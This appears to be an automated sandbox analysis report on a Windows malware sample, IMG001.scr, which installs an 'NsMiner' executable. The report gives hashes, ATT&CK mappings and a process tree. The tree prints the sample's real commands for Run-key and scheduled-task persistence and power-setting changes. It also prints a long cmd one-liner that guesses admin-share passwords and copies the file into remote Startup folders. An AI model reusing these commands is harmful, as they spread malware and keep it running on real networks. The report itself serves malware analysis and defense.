7126b9932dc0cdfe751340edfa7c4a14b69262eb1afd0530e6d1fdb2e25986dd

Analysis

max time kernel
144s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
16-09-2024 05:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

IMG001.scr
Size

3.4MB
MD5

fbbcf1e9501234d6661a0c9ae6dc01c9
SHA1

1ca9759a324159f331e79ea6871ad62040521b41
SHA256

d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512

027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140
SSDEEP

98304:M5VPnq1y5tQOM33ZNqCtBixHl54Oyjes1Ro6:2VPq1yLanrqTr43eON

Score

8^/10

defense_evasion discovery persistence

Malware Config

Signatures

Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exe

pid process

3684 cmd.exe

pid	process
3684	cmd.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

IMG001.scrIMG001.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	IMG001.scr
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	IMG001.exe

Drops startup file 1 IoCs

Processes:

IMG001.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk IMG001.exe
Executes dropped EXE 1 IoCs

Processes:

IMG001.exe

pid process

4660 IMG001.exe
Loads dropped DLL 5 IoCs

Processes:

IMG001.exe

pid process

4660 IMG001.exe
4660 IMG001.exe
4660 IMG001.exe
4660 IMG001.exe
4660 IMG001.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk	IMG001.exe

pid	process
4660	IMG001.exe

pid	process
4660	IMG001.exe
4660	IMG001.exe
4660	IMG001.exe
4660	IMG001.exe
4660	IMG001.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exeIMG001.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe"	IMG001.exe

Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

IMG001.exe

description ioc process

File opened (read-only) \??\E: IMG001.exe
Network Service Discovery 1 TTPs 2 IoCs
Attempt to gather information on host's network.
discovery

Network Service Discovery
T1046

Processes:

cmd.exeARP.EXE

pid process

2732 cmd.exe
2148 ARP.EXE
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
persistence

Power Settings
T1653

Processes:

cmd.exepowercfg.exepowercfg.exepowercfg.exe

pid process

2212 cmd.exe
1720 powercfg.exe
4792 powercfg.exe
3220 powercfg.exe
Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\UAC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened (read-only)	\??\E:	IMG001.exe

pid	process
2732	cmd.exe
2148	ARP.EXE

pid	process
2212	cmd.exe
1720	powercfg.exe
4792	powercfg.exe
3220	powercfg.exe

description	ioc	process
File created	C:\Windows\Tasks\UAC.job	schtasks.exe

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

IMG001.execmd.exefind.exeARP.EXEcmd.execmd.exeIMG001.scrfind.execmd.exereg.execmd.exeschtasks.exefind.exenet.execmd.exeschtasks.execmd.exenet.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ARP.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IMG001.scr
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	find.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

NSIS installer 2 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_1
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe	nsis_installer_2

Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

4404 net.exe
1444 net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3196 schtasks.exe
2484 schtasks.exe

pid	process
4404	net.exe
1444	net.exe

pid	process
3196	schtasks.exe
2484	schtasks.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	1720	powercfg.exe
Token: SeCreatePagefilePrivilege	1720	powercfg.exe
Token: SeShutdownPrivilege	4792	powercfg.exe
Token: SeCreatePagefilePrivilege	4792	powercfg.exe
Token: SeShutdownPrivilege	3220	powercfg.exe
Token: SeCreatePagefilePrivilege	3220	powercfg.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

IMG001.scrIMG001.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 896 wrote to memory of 4660	896	IMG001.scr	IMG001.exe
PID 896 wrote to memory of 4660	896	IMG001.scr	IMG001.exe
PID 896 wrote to memory of 4660	896	IMG001.scr	IMG001.exe
PID 4660 wrote to memory of 5076	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 5076	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 5076	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 1056	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 1056	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 1056	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 3460	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 3460	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 3460	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 2212	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 2212	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 2212	4660	IMG001.exe	cmd.exe
PID 5076 wrote to memory of 3992	5076	cmd.exe	reg.exe
PID 5076 wrote to memory of 3992	5076	cmd.exe	reg.exe
PID 5076 wrote to memory of 3992	5076	cmd.exe	reg.exe
PID 1056 wrote to memory of 3196	1056	cmd.exe	schtasks.exe
PID 1056 wrote to memory of 3196	1056	cmd.exe	schtasks.exe
PID 1056 wrote to memory of 3196	1056	cmd.exe	schtasks.exe
PID 3460 wrote to memory of 2484	3460	cmd.exe	schtasks.exe
PID 3460 wrote to memory of 2484	3460	cmd.exe	schtasks.exe
PID 3460 wrote to memory of 2484	3460	cmd.exe	schtasks.exe
PID 2212 wrote to memory of 1720	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 1720	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 1720	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 4792	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 4792	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 4792	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 3220	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 3220	2212	cmd.exe	powercfg.exe
PID 2212 wrote to memory of 3220	2212	cmd.exe	powercfg.exe
PID 4660 wrote to memory of 3684	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 3684	4660	IMG001.exe	cmd.exe
PID 4660 wrote to memory of 3684	4660	IMG001.exe	cmd.exe
PID 3684 wrote to memory of 2732	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 2732	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 2732	3684	cmd.exe	cmd.exe
PID 2732 wrote to memory of 4404	2732	cmd.exe	net.exe
PID 2732 wrote to memory of 4404	2732	cmd.exe	net.exe
PID 2732 wrote to memory of 4404	2732	cmd.exe	net.exe
PID 2732 wrote to memory of 4988	2732	cmd.exe	find.exe
PID 2732 wrote to memory of 4988	2732	cmd.exe	find.exe
PID 2732 wrote to memory of 4988	2732	cmd.exe	find.exe
PID 2732 wrote to memory of 2148	2732	cmd.exe	ARP.EXE
PID 2732 wrote to memory of 2148	2732	cmd.exe	ARP.EXE
PID 2732 wrote to memory of 2148	2732	cmd.exe	ARP.EXE
PID 2732 wrote to memory of 960	2732	cmd.exe	find.exe
PID 2732 wrote to memory of 960	2732	cmd.exe	find.exe
PID 2732 wrote to memory of 960	2732	cmd.exe	find.exe
PID 3684 wrote to memory of 3908	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 3908	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 3908	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 2804	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 2804	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 2804	3684	cmd.exe	cmd.exe
PID 2804 wrote to memory of 1444	2804	cmd.exe	net.exe
PID 2804 wrote to memory of 1444	2804	cmd.exe	net.exe
PID 2804 wrote to memory of 1444	2804	cmd.exe	net.exe
PID 2804 wrote to memory of 4928	2804	cmd.exe	find.exe
PID 2804 wrote to memory of 4928	2804	cmd.exe	find.exe
PID 2804 wrote to memory of 4928	2804	cmd.exe	find.exe

C:\Users\Admin\AppData\Local\Temp\IMG001.scr
"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:896

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4660

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5076

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ
4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:3992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1056

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3196

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"
4⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
3⤵
- Power Settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -standby-timeout-ac 0
4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\SysWOW64\powercfg.exe
powercfg /CHANGE -hibernate-timeout-ac 0
4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4792

C:\Windows\SysWOW64\powercfg.exe
Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000
4⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3220

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0401& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))
3⤵
- Indicator Removal: Network Share Connection Removal
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"
4⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2732

C:\Windows\SysWOW64\net.exe
net view
5⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:4404

C:\Windows\SysWOW64\find.exe
find /i "\\"
5⤵
- System Location Discovery: System Language Discovery
PID:4988

C:\Windows\SysWOW64\ARP.EXE
arp -a
5⤵
- Network Service Discovery
- System Location Discovery: System Language Discovery
PID:2148

C:\Windows\SysWOW64\find.exe
find /i " 1"
5⤵
- System Location Discovery: System Language Discovery
PID:960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c set str_
4⤵
- System Location Discovery: System Language Discovery
PID:3908

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "
4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804

C:\Windows\SysWOW64\net.exe
net view \\10.127.0.1
5⤵
- System Location Discovery: System Language Discovery
- Discovers systems in the same network
PID:1444

C:\Windows\SysWOW64\find.exe
find /i " "
5⤵
- System Location Discovery: System Language Discovery
PID:4928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4352,i,1828333185976713750,7918646547767660928,262144 --variations-seed-version --mojo-platform-channel-handle=4052 /prefetch:8
1⤵
PID:3868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nss3BF8.tmp\inetc.dll
Filesize
21KB

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
Filesize
3.4MB

MD5
fbbcf1e9501234d6661a0c9ae6dc01c9

SHA1
1ca9759a324159f331e79ea6871ad62040521b41

SHA256
d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c

SHA512
027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140

Download Submit